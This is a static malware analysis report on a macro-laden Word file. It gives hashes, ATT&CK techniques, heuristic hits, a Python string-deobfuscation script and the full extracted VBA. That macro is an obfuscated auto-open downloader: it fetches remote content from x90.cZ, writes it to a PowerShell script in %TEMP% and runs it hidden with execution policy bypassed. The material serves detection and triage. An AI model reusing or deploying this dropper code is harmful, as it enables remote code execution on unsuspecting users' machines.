Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 bd9c0a2035864f3d…

MALICIOUS

Office (OOXML)

Size: 48.9 KB
Created: 2021-02-06 17:25:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-05-29
MD5: 9bf01ecee23f54efc3acc8f67a66a88c
SHA-1: 4385b7d76e6ce8e4263c2a92707037d73c65ca0b
SHA-256: bd9c0a2035864f3dfb3d0dc987ad3eb7282278f8dca399254b419f6c26ef0cfd
Risk score: 438

Malware Insights

MITRE ATT&CK
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1105 Ingress Tool Transfer
  • T1204.002 User Execution: Malicious File

The sample carries a VBA project whose Document_Open handler runs as soon as the document is opened with macros enabled. Every string the macro needs is reassembled at run time by concatenating dozens of two- to five-character getter functions (getA() ... getZZ(), vv3223(), Ssfas2E(), dsa241(), getAC(), ...), which is the shape the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic looks for. Document_Open first performs a block of arithmetic on Variant locals that decides which of its five If branches are taken: alpha becomes beta * gamma (40735464), epsilon becomes a fraction below 1, gamma is recomputed to exactly 4422 (eta / zeta, where eta = gamma * zeta) and delta stays 5647. The live path is therefore the gamma and delta branches. They build two URLs, "HttPs://x90.cZ/misc/01292.oob" and "HttPs://x90.cZ/misc/01292.vm2", and hand them to X1sla3, which instantiates CreateObject("Microsoft.XmlHttp"), issues a GET to each URL, writes both response bodies in order to %TEMP%\Temp.ps1 through Scripting.FileSystemObject (R0asda3, with the Unicode flag set, so the dropped script is UTF-16 with a BOM), and then in kfid runs "powershell.exe -nologo -ExecutionPolicy bypass -file %TEMP%\Temp.ps1" via Wscript.Shell.Run with a hidden window. Those are the lines behind the OLE_VBA_PS, OLE_VBA_WSCRIPT and OLE_VBA_CREATEOBJ matches, and they are what to hunt for: WINWORD.EXE writing a .ps1 into %TEMP% and spawning powershell.exe with -ExecutionPolicy bypass -file.

The URLDownloadToFile import (psi) and the Shell call (oPlsoa3) that trigger OLE_VBA_DOWNLOAD and OLE_VBA_SHELL are never reached. Ls21fa is only called when alpha = 1122, which the arithmetic rules out; its body is further guarded by IsArray() on a String argument; and SloA12 tests an unset local kappa and passes the URL, the parameter and the zeros as one string literal to a five-argument declaration. The literal https://www.untrustednetwork.net/misc/payload1.nul is therefore a decoy in dead code, while the x90.cZ URLs that the live path requests never appear verbatim in the source and so are missing from the embedded-URL list below.

The module header comment claims the file belongs to the European Cyber Security Challenge 2021 and only simulates malicious behaviour. Nothing in the file lets that claim be verified, and the code as written fetches and executes remote PowerShell, so the MALICIOUS verdict rests on the observed behaviour; treat the comment as a triage hint, not as evidence.
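The string reconstruction described above can be undone statically, without running the macro. The Python resolver below is an added example and is not code from this report, from oletools or from the sample. It collects every parameterless VBA function that returns a single literal (or aliases one, as salww = jfsakl does), then rewrites each + or & concatenation in terms of those values, rendering Environ(x) as %x%. Its input is a constructed excerpt of the extracted macros.bas with the getters condensed to one line each using VBA's ':' separator (the multi-line form on the page matches the same pattern); names are lower-cased because VBA is case-insensitive, and tag() is a deliberately coarse triage label.

```python
"""Static resolver for the getter-concatenation strings in the extracted macro.
Added example, not the report's or the sample's code. Environ(x) is rendered as %x%.
"""
import re

# Constructed input modelled on macros.bas above: the getters behind the live
# Document_Open branch, one per line using VBA's ':' separator, then the consumers.
SAMPLE_VBA = r'''
Function getE() As String: getE = "Ht": End Function
Function getK() As String: getK = "tPs": End Function
Function getL() As String: getL = ":": End Function
Function getN() As String: getN = "/": End Function
Function getW() As String: getW = "x90": End Function
Function getR() As String: getR = ".": End Function
Function getH() As String: getH = "cZ": End Function
Function getO() As String: getO = "mi": End Function
Function getP() As String: getP = "sc": End Function
Function getQ() As String: getQ = "01292": End Function
Function getV() As String: getV = "oob": End Function
Function getS() As String: getS = "vm2": End Function
Function vv3223() As String: vv3223 = "Mic": End Function
Function Ssfas2E() As String: Ssfas2E = "roso": End Function
Function dsa241() As String: dsa241 = "ft.Xm": End Function
Function getAC() As String: getAC = "lHttp": End Function
Function Gsa33() As String: Gsa33 = "Temp": End Function
Function looo1() As String: looo1 = ".ps1": End Function
Function jfsakl() As String: jfsakl = "powershell.exe -nologo -ExecutionPolicy bypass": End Function
Function salww() As String: salww = jfsakl: End Function
S1sla = getE() + getK() + getL() + getN() + getN() + getW() + getR() + getH() + getN() + getO() + getP() + getN() + getQ() + getR() + getV()
L0pet = getE() + getK() + getL() + getN() + getN() + getW() + getR() + getH() + getN() + getO() + getP() + getN() + getQ() + getR() + getS()
Set uL7sy12 = CreateObject(vv3223() + Ssfas2E() + dsa241() + getAC())
sdeee1 = salww + " -file " + Environ(Gsa33()) + "\" + Gsa33() + looo1()
waA7S = Environ("temp") & "\runme." & "ps1"
'''

FUNC = re.compile(r"Function\s+(?P<name>\w+)\s*\(\s*\)\s+As\s+String\s*(?P<body>.*?)End Function",
                  re.IGNORECASE | re.DOTALL)
ATOM = r'"[^"]*"|Environ\(\s*(?:"[^"]*"|\w+\(\s*\))\s*\)|\w+(?:\(\s*\))?'
CONCAT = re.compile(rf"(?:{ATOM})(?:\s*[+&]\s*(?:{ATOM}))+", re.IGNORECASE)
TOKEN = re.compile(r'"(?P<lit>[^"]*)"'
                   r'|Environ\(\s*(?:"(?P<envlit>[^"]*)"|(?P<envcall>\w+)\(\s*\))\s*\)'
                   r'|(?P<call>\w+)(?:\(\s*\))?', re.IGNORECASE)


def collect_getters(src):
    """Map lower-cased function name -> the literal it returns (aliases followed one hop)."""
    raw = {}
    for m in FUNC.finditer(src):
        name = m.group("name")
        a = re.search(rf'\b{re.escape(name)}\s*=\s*(?:"(?P<lit>[^"]*)"|(?P<ref>\w+))',
                      m.group("body"), re.IGNORECASE)
        if a is None:
            continue
        lit, ref = a.group("lit"), a.group("ref")
        raw[name.lower()] = ("lit", lit) if lit is not None else ("ref", ref.lower())
    getters = {n: v for n, (k, v) in raw.items() if k == "lit"}
    for name, (kind, val) in raw.items():  # salww = jfsakl style aliases
        if kind == "ref" and val in getters:
            getters[name] = getters[val]
    return getters


def resolve_expressions(src):
    """Return (line_no, expression, resolved_text, unresolved_count) per concatenation."""
    getters = collect_getters(src)
    out = []
    for line_no, line in enumerate(src.splitlines(), 1):
        for m in CONCAT.finditer(line):
            parts, unresolved = [], 0
            for t in TOKEN.finditer(m.group(0)):
                if t.group("lit") is not None:
                    parts.append(t.group("lit"))
                elif t.group("envlit") is not None:
                    parts.append(f"%{t.group('envlit')}%")
                elif t.group("envcall") is not None:
                    parts.append(f"%{getters.get(t.group('envcall').lower(), '?')}%")
                elif t.group("call").lower() in getters:
                    parts.append(getters[t.group("call").lower()])
                else:  # plain variable or numeric operand: keep a placeholder
                    parts.append(f"<{t.group('call')}>")
                    unresolved += 1
            out.append((line_no, m.group(0), "".join(parts), unresolved))
    return out


def tag(text):
    """Coarse triage label for a resolved string."""
    if re.match(r"https?://", text, re.IGNORECASE):
        return "url"
    if re.search(r"\.exe\b", text, re.IGNORECASE):
        return "command"
    if "\\" in text or "%" in text:
        return "path"
    return "progid" if re.fullmatch(r"[A-Za-z]\w*(?:\.\w+)+", text) else "string"


def indicators(src):
    """Fully resolved strings with a triage tag, in source order."""
    return [(text, tag(text)) for _, _, text, n in resolve_expressions(src) if n == 0]


if __name__ == "__main__":
    print(*indicators(SAMPLE_VBA), sep="\n")
```

Run against the full olevba output of the real file, indicators() also returns the junk strings built in the decoy branches (for example "V0Bftp002t2HtcZ"), tagged "string": the resolver does not evaluate the arithmetic gates in Document_Open, so deciding which branch is live is still the analyst's job. Numeric expressions such as iota = eta + theta + iota come back with unresolved placeholders and are filtered out.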

Heuristics 12

  • VBA project inside OOXML medium 9 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Sub oPlsoa3(cmd As String)
        Shell cmd
    End Sub
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        If IsArray(var) = False Then
            aa99a = "Wscript.Shell"
        End If
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
    Function jfsakl() As String
     jfsakl = "powershell.exe -nologo -ExecutionPolicy bypass"
    End Function
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Function psi Lib "urlmon" _
            Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
                                        ByVal szURL As String, ByVal szFileName As String, _
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Function X1sla3(X9ss, los4) As String
        Set uL7sy12 = CreateObject(vv3223() + Ssfas2E() + dsa241() + getAC())
        uL7sy12.Open getZZ(), los4, False
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Function X1sla3(X9ss, los4) As String
        Set uL7sy12 = CreateObject(vv3223() + Ssfas2E() + dsa241() + getAC())
        uL7sy12.Open getZZ(), los4, False
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        Dim waA7S As String
        waA7S = Environ("temp") & "\runme." & "ps1"
        If IsArray(dast) = True Then
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.untrustednetwork.net/misc/payload1.nul Referenced by macro
    Caveat: this is the only URL that occurs verbatim in the macro, and it sits in SloA12, a routine that Document_Open never reaches. The URLs the live path actually requests, "HttPs://x90.cZ/misc/01292.oob" and "HttPs://x90.cZ/misc/01292.vm2", are assembled at run time from getter functions and are not listed here; they are the indicators to block.
    The remaining entries are XML namespace URIs that every Word OOXML document declares in its document parts. They are not network indicators, and none of them occurs in the extracted macros.bas, so the "Referenced by macro" label on them does not match the extracted source.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartex Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex Referenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006 Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/ink Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3d Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/math Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing Referenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordml Referenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordml Referenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml/cex Referenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cid Referenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml Referenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symex Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk Referenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordml Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8483 bytes
SHA-256: 22ec391741a94390794b08af08e9b53656fe358021b0792f864f63d9d0a77116
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' --------------------------------------------------------------------
'
' This file is part of the European Cyber Security Challenge 2021
'
' Treat it as you would any potentially dangerous file and exercise
' appropriate caution when analyzing it.
'
' Although it is benign, it simulates certain actions, which might
' lead to it being classified as malicious by anti-malware products.
'
' --------------------------------------------------------------------

Private Sub Document_Open()
    
    Dim alpha, beta, gamma, delta, epsilon, zeta, eta, theta, iota As Long
    Dim S1sla, L0pet As String
    
    alpha = 1122
    beta = 9212
    gamma = 4422
    delta = 5647
    epsilon = 1139
    zeta = 6673
    eta = 7474
    theta = 1337
    iota = 1002
    kappa = 7892
    
    alpha = beta * gamma
    gamma = eta - delta
    kappa = alpha * zeta
    eta = kappa / beta
    iota = eta + theta + iota
    gamma = eta / zeta
    zeta = alpha + epsilon
    epsilon = iota / alpha
    
    S1sla = getA() + getB() + getC() + getD() + getE() + getH()
    L0pet = getX() + getY() + getA() + getZ() + getE() + getF() + getX()
    
    If alpha = 1122 Then
        S1sla = getE() + getA() + getD() + getS() + getK() + getL() + getP() + getR() + getA() + getA() + getE() + getN() + getW() + getQ() + getS()
        L0pet = getK() + getL() + getP() + getR() + getA() + getA() + getE() + getN() + getW() + getQ() + getS() + getE() + getA() + getD() + getS()
        Ls21fa (S1sla)
    End If
    
    If alpha = 9212 Then
       L0pet = getT() + getU() + getW() + getV() + getH() + getH() + getL() + getI() + getJ() + getM() + getP() + getA() + getS() + getU() + getU()
    End If
    
    If gamma = 4422 Then
       S1sla = getE() + getK() + getL() + getN() + getN() + getW() + getR() + getH() + getN() + getO() + getP() + getN() + getQ() + getR() + getV()
    End If
    
    If delta = 5647 Then
       L0pet = getE() + getK() + getL() + getN() + getN() + getW() + getR() + getH() + getN() + getO() + getP() + getN() + getQ() + getR() + getS()
       X1sla3 S1sla, L0pet
    End If
    
    If epsilon = 1139 Then
       S1sla = getP() + getA() + getL() + getA() + getD() + getA() + getW() + getE() + getB() + getH() + getO() + getL() + getE() + getM() + getA()
        X1sla3 S1sla, L0pet
    End If
        
    
End Sub


Attribute VB_Name = "Module1"
Sub Ls21fa(dast)
    Dim waA7S As String
    waA7S = Environ("temp") & "\runme." & "ps1"
    If IsArray(dast) = True Then
        SloA12 (waA7S)
        oPlsoa3 waA7S
    End If
End Sub

Function getA() As String
    If IsArray(var) = False Then
        getA = "V0B"
    End If
End Function

Function X1sla3(X9ss, los4) As String
    Set uL7sy12 = CreateObject(vv3223() + Ssfas2E() + dsa241() + getAC())
    uL7sy12.Open getZZ(), los4, False
    uL7sy12.Send
    goS67A = uL7sy12.responseText
    uL7sy12.Open getZZ(), X9ss, False
    uL7sy12.Send
    R0asda3 uL7sy12.responseText, goS67A
    kfid
End Function

Function getB() As String
    If IsArray(var) = False Then
        getB = "ftp"
    End If
End Function

Function getC() As String
    If IsArray(var) = False Then
        getC = "002"
    End If
End Function


Attribute VB_Name = "Module2"
Private Declare PtrSafe Function psi Lib "urlmon" _
        Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
                                    ByVal szURL As String, ByVal szFileName As String, _
                                    ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Function dsa241() As String
    If IsArray(var) = False Then
        dsa241 = "ft.Xm"
    End If
End Function

Function Ssfas2E() As String
    If IsArray(var) = False Then
        Ssfas2E = "roso"
    End If
End Function

Function jfsakl() As String
 jfsakl = "powershell.exe -nologo -ExecutionPolicy bypass"
End Function

Function getT() As String
    If IsArray(var) = False Then
        getT = "apsl"
    End If
End Function

Function getU() As String
    If IsArray(var) = False Then
        getU = "s0j"
    End If
End Function

Function getAC() As String
    If IsArray(var) = False Then
        getAC = "lHttp"
    End If
End Function

Function salww() As String
 salww = jfsakl
End Function

Function getV() As String
    If IsArray(var) = False Then
        getV = "oob"
    End If
End Function

Public Sub SloA12(Param)
If kappa = 1234 Then
    psi 0, "https://www.untrustednetwork.net/misc/payload1.nul, Param, 0, 0"
End If
End Sub

Function getW() As String
    If IsArray(var) = False Then
        getW = "x90"
    End If
End Function

Function vv3223() As String
    If IsArray(var) = False Then
        vv3223 = "Mic"
    End If
End Function

Public Sub kfid()
    sdeee1 = salww + " -file " + Environ(Gsa33()) + "\" + Gsa33() + looo1()
    Set lsi = CreateObject(aa99a)
    lsi.Run sdeee1, 0
    
End Sub


Function sims22() As String
    If IsArray(var) = False Then
        sims22 = "jscript"
    End If
End Function



Attribute VB_Name = "Module3"
Function getD() As String
    If IsArray(var) = False Then
        getD = "t2"
    End If
End Function

Function getE() As String
    If IsArray(var) = False Then
        getE = "Ht"
    End If
End Function

Function getF() As String
    If IsArray(var) = False Then
        getF = "Zqwj"
    End If
End Function

Function getH() As String
    If IsArray(var) = False Then
        getH = "cZ"
    End If
End Function

Function getI() As String
    If IsArray(var) = False Then
        getI = "_"
    End If
End Function

Function getJ() As String
    If IsArray(var) = False Then
        getJ = "eA8"
    End If
End Function

Function getK() As String
    If IsArray(var) = False Then
        getK = "tPs"
    End If
End Function

Function getL() As String
    If IsArray(var) = False Then
        getL = ":"
    End If
End Function

Function getM() As String
    If IsArray(var) = False Then
        getM = "JH6L4"
    End If
End Function

Function R0asda3(kl1a, sa12) As String
    Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    Dim Fileout As Object
    Set Fileout = fso.CreateTextFile(Environ(Gsa33()) + "\" + Gsa33() + looo1(), True, True)
    Fileout.Write kl1a
    Fileout.Write sa12
End Function

Function getN() As String
    If IsArray(var) = False Then
        getN = "/"
    End If
End Function

Function getO() As String
    If IsArray(var) = False Then
        getO = "mi"
    End If
End Function

Function getP() As String
    If IsArray(var) = False Then
        getP = "sc"
    End If
End Function

Function getQ() As String
    If IsArray(var) = False Then
        getQ = "01292"
    End If
End Function

Function getR() As String
    If IsArray(var) = False Then
        getR = "."
    End If
End Function

Function getS() As String
    If IsArray(var) = False Then
        getS = "vm2"
    End If
End Function

Sub oPlsoa3(cmd As String)
    Shell cmd
End Sub


Function getX() As String
    If IsArray(var) = False Then
        getX = "zIp"
    End If
End Function

Function getY() As String
    If IsArray(var) = False Then
        getY = "iEX"
    End If
End Function

Function getZ() As String
    If IsArray(var) = False Then
        getZ = "www"
    End If
End Function

Function getZZ() As String
    If IsArray(var) = False Then
        getZZ = "gEt"
    End If
End Function




Attribute VB_Name = "Module4"
Function Gsa33() As String
    If IsArray(var) = False Then
        Gsa33 = "Temp"
    End If
End Function

Public Sub sa57s()
    Kill "C:\Windows\payload1.exe"
End Sub

Function des999() As String
    If IsArray(var) = False Then
        des999 = "apsl"
    End If
End Function

Function looo1() As String
    If IsArray(var) = False Then
        looo1 = ".ps1"
    End If
End Function

Function aa99a() As String
    If IsArray(var) = False Then
        aa99a = "Wscript.Shell"
    End If
End Function

vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 56320 bytes
SHA-256: 1cb01ab51e3aa880af954d04eea3130f77cad8eae75da38ba5daf91145154a2c